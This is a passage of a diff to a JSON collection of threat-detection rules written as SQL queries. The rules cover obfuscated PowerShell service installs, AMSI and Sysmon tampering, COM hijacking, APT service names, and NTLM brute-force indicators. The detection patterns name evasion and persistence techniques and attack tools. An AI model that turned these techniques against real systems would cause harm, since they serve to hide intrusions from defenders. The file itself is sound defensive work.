Manager' AND EventID = '7045' AND (ImagePath LIKE '% /c %' ESCAPE '\\' OR ImagePath LIKE '% /r %' ESCAPE '\\' OR ImagePath LIKE '% /k %' ESCAPE '\\') AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\' OR ImagePath LIKE '%wscript%' ESCAPE '\\' OR ImagePath LIKE '%cscript%' ESCAPE '\\' OR ImagePath LIKE '%mshta%' ESCAPE '\\' OR ImagePath LIKE '%rundll32%' ESCAPE '\\' OR ImagePath LIKE '%regsvr32%' ESCAPE '\\'))" ], - "filename": "registry_delete_schtasks_hide_task_via_sd_value_removal.yml" + "filename": "win_system_susp_service_installation_script.yml" }, { - "title": "Removal of Potential COM Hijacking Registry Keys", - "id": "96f697b0-b499-4e5d-9908-a67bec11cdb6", - "status": "test", - "description": "Detects any deletion of entries in \".*\\shell\\open\\command\" registry keys.\nThese registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - System", + "id": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", + "status": "experimental", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1027" ], "falsepositives": [ - "Legitimate software (un)installations are known to cause some false positives. Please add them as a filter when encountered" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\shell\\\\open\\\\command' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') OR (Image LIKE '%\\\\Dropbox.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Dropbox.%' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Wireshark\\_uninstaller.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\wireshark-capture-file\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Opera\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Opera\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\installer.exe' ESCAPE '\\') OR (Image LIKE '%peazip%' ESCAPE '\\' AND TargetObject LIKE '%\\\\PeaZip.%' ESCAPE '\\') OR (Image LIKE '%\\\\Everything.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Everything.%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\installer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Classes\\\\WOW6432Node\\\\CLSID\\\\{4299124F-F2C3-41b4-9C73-9236B2AD0E8F}%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND (ImagePath REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ImagePath REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ImagePath REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ImagePath REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ImagePath REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ImagePath REGEXP '\\$VerbosePreference\\.ToString\\(' OR ImagePath REGEXP '\\String\\]\\s*\\$VerbosePreference'))" ], - "filename": "registry_delete_removal_com_hijacking_registry_key.yml" + "filename": "win_system_invoke_obfuscation_obfuscated_iex_services.yml" }, { - "title": "Removal Of AMSI Provider Registry Keys", - "id": "41d1058a-aea7-4952-9293-29eaaf516465", - "status": "test", - "description": "Detects the deletion of AMSI provider registry key entries in HKLM\\Software\\Microsoft\\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.", - "author": "frack113", + "title": "Invoke-Obfuscation Via Use Rundll32 - System", + "id": "641a4bfb-c017-44f7-800c-2aee0184ce9b", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteKey' AND (TargetObject LIKE '%{2781761E-28E0-4109-99FE-B9D127C57AFE}' ESCAPE '\\' OR TargetObject LIKE '%{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ImagePath LIKE '%value%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%comspec%' ESCAPE '\\' OR ImagePath LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "registry_delete_removal_amsi_registry_key.yml" + "filename": "win_system_invoke_obfuscation_via_use_rundll32_services.yml" }, { - "title": "Terminal Server Client Connection History Cleared - Registry", - "id": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", + "title": "StoneDrill Service Install", + "id": "9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6", "status": "test", - "description": "Detects the deletion of registry keys containing the MSTSC connection history", - "author": "Christian Burkard (Nextron Systems)", + "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1112" + "attack.persistence", + "attack.g0064", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Default\\\\MRU%' ESCAPE '\\') OR (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Servers\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'NtsSrv' AND ImagePath LIKE '% LocalService' ESCAPE '\\')" ], - "filename": "registry_delete_mstsc_history_cleared.yml" + "filename": "win_system_apt_stonedrill.yml" }, { - "title": "Removal Of Index Value to Hide Schedule Task - Registry", - "id": "526cc8bc-1cdc-48ad-8b26-f19bff969cec", + "title": "KrbRelayUp Service Installation", + "id": "e97d9903-53b2-41fc-8cb9-889ed4093e80", "status": "experimental", - "description": "Detects when the \"index\" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as \"schtasks /query\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)", + "author": "Sittikorn S, Tim Shelton", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ "Unknown" ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\')" - ], - "filename": "registry_delete_schtasks_hide_task_via_index_value_removal.yml" - }, - { - "title": "Folder Removed From Exploit Guard ProtectedFolders List - Registry", - "id": "272e55a4-9e6b-4211-acb6-78f51f0b1b40", - "status": "experimental", - "description": "Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Legitimate administrators removing applications (should always be investigated)" - ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND ServiceName = 'KrbSCM')" ], - "filename": "registry_delete_exploit_guard_protected_folders.yml" + "filename": "win_system_krbrelayup_service_installation.yml" }, { - "title": "Potential COM Object Hijacking Via TreatAs Subkey - Registry", - "id": "9b0f8a61-91b2-464f-aceb-0527e0a45020", - "status": "experimental", - "description": "Detects COM object hijacking via TreatAs subkey", - "author": "Kutepov Anton, oscd.community", + "title": "Turla Service Install", + "id": "1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4", + "status": "test", + "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1546.015" + "attack.g0010", + "attack.t1543.003" ], "falsepositives": [ - "Maybe some system utilities in rare cases use linking keys for backward compatibility" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND TargetObject LIKE '%HKU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Classes\\\\CLSID\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\TreatAs%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('srservice', 'ipvpn', 'hkmsvc'))" ], - "filename": "registry_add_persistence_com_key_linking.yml" + "filename": "win_system_apt_carbonpaper_turla.yml" }, { - "title": "Suspicious Execution Of Renamed Sysinternals Tools - Registry", - "id": "f50f3c09-557d-492d-81db-9064a8d4e211", + "title": "Remote Utilities Host Service Install", + "id": "85cce894-dd8b-4427-a958-5cc47a4dc9b9", "status": "experimental", - "description": "Detects the creation of the \"accepteula\" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)", + "description": "Detects Remote Utilities Host service installation on the target system.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.persistence" ], "falsepositives": [ - "Unlikely" + "Legitimate use of the tool" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoggedon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPing%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsService%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsLoggedon.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsLoggedon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsPing.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsPing64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsService.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsService64.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%\\\\rutserv.exe%' ESCAPE '\\' AND ImagePath LIKE '%-service%' ESCAPE '\\') OR ServiceName = 'Remote Utilities - Host'))" ], - "filename": "registry_add_pua_sysinternals_renamed_execution_via_eula.yml" + "filename": "win_system_service_install_remote_utilities.yml" }, { - "title": "Potential NetWire RAT Activity - Registry", - "id": "1d218616-71b0-4c40-855b-9dbe75510f7f", + "title": "Invoke-Obfuscation VAR+ Launcher - System", + "id": "8ca7004b-e620-4ecb-870e-86129b5b8e75", "status": "experimental", - "description": "Detects registry keys related to NetWire RAT", - "author": "Christopher Peacock", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND TargetObject LIKE '%\\\\software\\\\NetWire%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%\"set%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "registry_add_malware_netwire.yml" + "filename": "win_system_invoke_obfuscation_var_services.yml" }, { - "title": "Potential Persistence Via Disk Cleanup Handler - Registry", - "id": "d4f4e0be-cf12-439f-9e25-4e2cdcf7df5a", + "title": "NetSupport Manager Service Install", + "id": "2d510d8d-912b-45c5-b1df-36faa3d8c3f4", "status": "experimental", - "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence.\nThe disk cleanup manager is part of the operating system. It displays the dialog box […]\nThe user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", + "description": "Detects NetSupport Manager service installation on the target system.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.persistence" ], "falsepositives": [ - "Legitimate new entry added by windows" + "Legitimate use of the tool" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\VolumeCaches\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE '%\\\\Active Setup Temp Folders' ESCAPE '\\' OR TargetObject LIKE '%\\\\BranchCache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Content Indexer Cleaner' ESCAPE '\\' OR TargetObject LIKE '%\\\\D3D Shader Cache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Delivery Optimization Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Device Driver Packages' ESCAPE '\\' OR TargetObject LIKE '%\\\\Diagnostic Data Viewer database files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Downloaded Program Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\DownloadsFolder' ESCAPE '\\' OR TargetObject LIKE '%\\\\Feedback Hub Archive log files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Internet Cache Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Language Pack' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft Office Temp Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Offline Pages Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Old ChkDsk Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Previous Installations' ESCAPE '\\' OR TargetObject LIKE '%\\\\Recycle Bin' ESCAPE '\\' OR TargetObject LIKE '%\\\\RetailDemo Offline Content' ESCAPE '\\' OR TargetObject LIKE '%\\\\Setup Log Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\System error memory dump files' ESCAPE '\\' OR TargetObject LIKE '%\\\\System error minidump files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Setup Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Sync Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Thumbnail Cache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Update Cleanup' ESCAPE '\\' OR TargetObject LIKE '%\\\\Upgrade Discarded Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\User file versions' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Defender' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Error Reporting Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows ESD installation files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Upgrade Log Files' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%\\\\NetSupport Manager\\\\client32.exe%' ESCAPE '\\' OR ServiceName = 'Client32'))" ], - "filename": "registry_add_persistence_disk_cleanup_handler_entry.yml" + "filename": "win_system_service_install_netsupport_manager.yml" }, { - "title": "Potential Persistence Via New AMSI Providers - Registry", - "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705", - "status": "experimental", - "description": "Detects when an attacker registers a new AMSI provider in order to achieve persistence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential RDP Exploit CVE-2019-0708", + "id": "aaa5b30d-f418-420b-83a0-299cb6024885", + "status": "test", + "description": "Detect suspicious error on protocol RDP, potential CVE-2019-0708", + "author": "Lionel PRAT, Christophe BROCAS, @atc_project (improvements)", "tags": [ - "attack.persistence" + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" ], "falsepositives": [ - "Legitimate security products adding their own AMSI providers. Filter these according to your environment" + "Bad connections or network interruptions" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('56', '50') AND Provider_Name = 'TermDD')" ], - "filename": "registry_add_persistence_amsi_providers.yml" + "filename": "win_system_rdp_potential_cve_2019_0708.yml" }, { - "title": "PUA - Sysinternal Tool Execution - Registry", - "id": "25ffa65d-76d8-4da5-a832-3f2b0136e133", + "title": "Suspicious Usage of CVE_2021_34484 or CVE 2022_21919", + "id": "52a85084-6989-40c3-8f32-091e12e17692", "status": "experimental", - "description": "Detects the execution of a Sysinternals Tool via the creation of the \"accepteula\" registry key", - "author": "Markus Neis", + "description": "During exploitation of this vulnerability, two logs (Provider_Name:Microsoft-Windows-User Profiles Service) with EventID 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation. Viewed on 2008 Server", + "author": "Cybex", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.execution" ], "falsepositives": [ - "Legitimate use of SysInternals tools", - "Programs that use the same Registry Key" + "Corrupted user profiles - https://social.technet.microsoft.com/wiki/contents/articles/3571.windows-user-profiles-service-event-1511-windows-cannot-find-the-local-profile-and-is-logging-you-on-with-a-temporary-profile.aspx" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1511' AND Provider_Name = 'Microsoft-Windows-User Profiles Service')" ], - "filename": "registry_add_pua_sysinternals_execution_via_eula.yml" + "filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml" }, { - "title": "Potential Persistence Via Logon Scripts - Registry", - "id": "9ace0707-b560-49b8-b6ca-5148b42f39fb", + "title": "USB Device Plugged", + "id": "1a4bd6e3-4c6e-405d-a9a3-53a116e341d4", "status": "test", - "description": "Detects creation of UserInitMprLogonScript persistence method", - "author": "Tom Ueltschi (@c_APT_ure)", + "description": "Detects plugged/unplugged USB devices", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1037.001", - "attack.persistence", - "attack.lateral_movement" + "attack.initial_access", + "attack.t1200" ], "falsepositives": [ - "Exclude legitimate logon scripts" + "Legitimate administrative activity" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND TargetObject LIKE '%UserInitMprLogonScript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-DriverFrameworks-UserMode/Operational' AND EventID IN ('2003', '2100', '2102'))" ], - "filename": "registry_add_persistence_logon_scripts_userinitmprlogonscript.yml" + "filename": "win_usb_device_plugged.yml" }, { - "title": "PUA - Sysinternals Tools Execution - Registry", - "id": "c7da8edc-49ae-45a2-9e61-9fd860e4e73d", - "status": "experimental", - "description": "Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the \"accepteula\" registry key.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Remote Desktop Connection to Non-Domain Host", + "id": "ce5678bb-b9aa-4fb5-be4b-e57f686256ad", + "status": "test", + "description": "Detects logons using NTLM to hosts that are potentially not part of the domain.", + "author": "James Pemberton", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate use of SysInternals tools. Filter the legitimate paths used in your environnement" + "Host connections to valid domains, exclude these.", + "Host connections not using host FQDN.", + "Host connections to external legitimate domains." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sysinternals%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-NTLM/Operational' AND EventID = '8001' AND TargetName LIKE 'TERMSRV%' ESCAPE '\\')" ], - "filename": "registry_add_pua_sysinternals_susp_execution_via_eula.yml" + "filename": "win_susp_ntlm_rdp.yml" }, { - "title": "Potential Ursnif Malware Activity - Registry", - "id": "21f17060-b282-4249-ade0-589ea3591558", + "title": "NTLM Brute Force", + "id": "9c8acf1a-cbf9-4db6-b63c-74baabe03e59", "status": "test", - "description": "Detects registry keys related to Ursnif malware.", - "author": "megan201296", + "description": "Detects common NTLM brute force device names", + "author": "Jerry Shockley '@jsh0x'", "tags": [ - "attack.execution", - "attack.t1112" + "attack.credential_access", + "attack.t1110" ], "falsepositives": [ - "Unknown" + "Systems with names equal to the spoofed ones used by the brute force tools" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\Software\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\RepService\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\IME\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-NTLM/Operational' AND EventID = '8004' AND WorkstationName IN ('Rdesktop', 'Remmina', 'Freerdp', 'Windows7', 'Windows8', 'Windows2012', 'Windows2016', 'Windows2019'))" ], - "filename": "registry_add_malware_ursnif.yml" + "filename": "win_susp_ntlm_brute_force.yml" }, { - "title": "Sysmon Configuration Change", - "id": "8ac03a65-6c84-4116-acad-dc1558ff7a77", - "status": "test", - "description": "Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying manipulate the configuration", - "author": "frack113", + "title": "NTLM Logon", + "id": "98c3bcf1-56f2-49dc-9d8d-c66cf190238b", + "status": "experimental", + "description": "Detects logons using NTLM, which could be caused by a legacy source or attackers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.lateral_movement", + "attack.t1550.002" ], "falsepositives": [ - "Legitimate administrative action" + "Legacy hosts" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventID = '16')" + "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-NTLM/Operational' AND EventID = '8002' AND ProcessName LIKE '%' ESCAPE '\\')" ], - "filename": "sysmon_config_modification.yml" + "filename": "win_susp_ntlm_auth.yml" }, { - "title": "Sysmon Configuration Modification", - "id": "1f2b5353-573f-4880-8e33-7d04dcf97744", - "status": "test", - "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it", - "author": "frack113", + "title": "Suspicious Digital Signature Of AppX Package", + "id": "b5aa7d60-c17e-4538-97de-09029d6cd76b", + "status": "experimental", + "description": "Detects execution of AppX packages with known suspicious or malicious signature", + 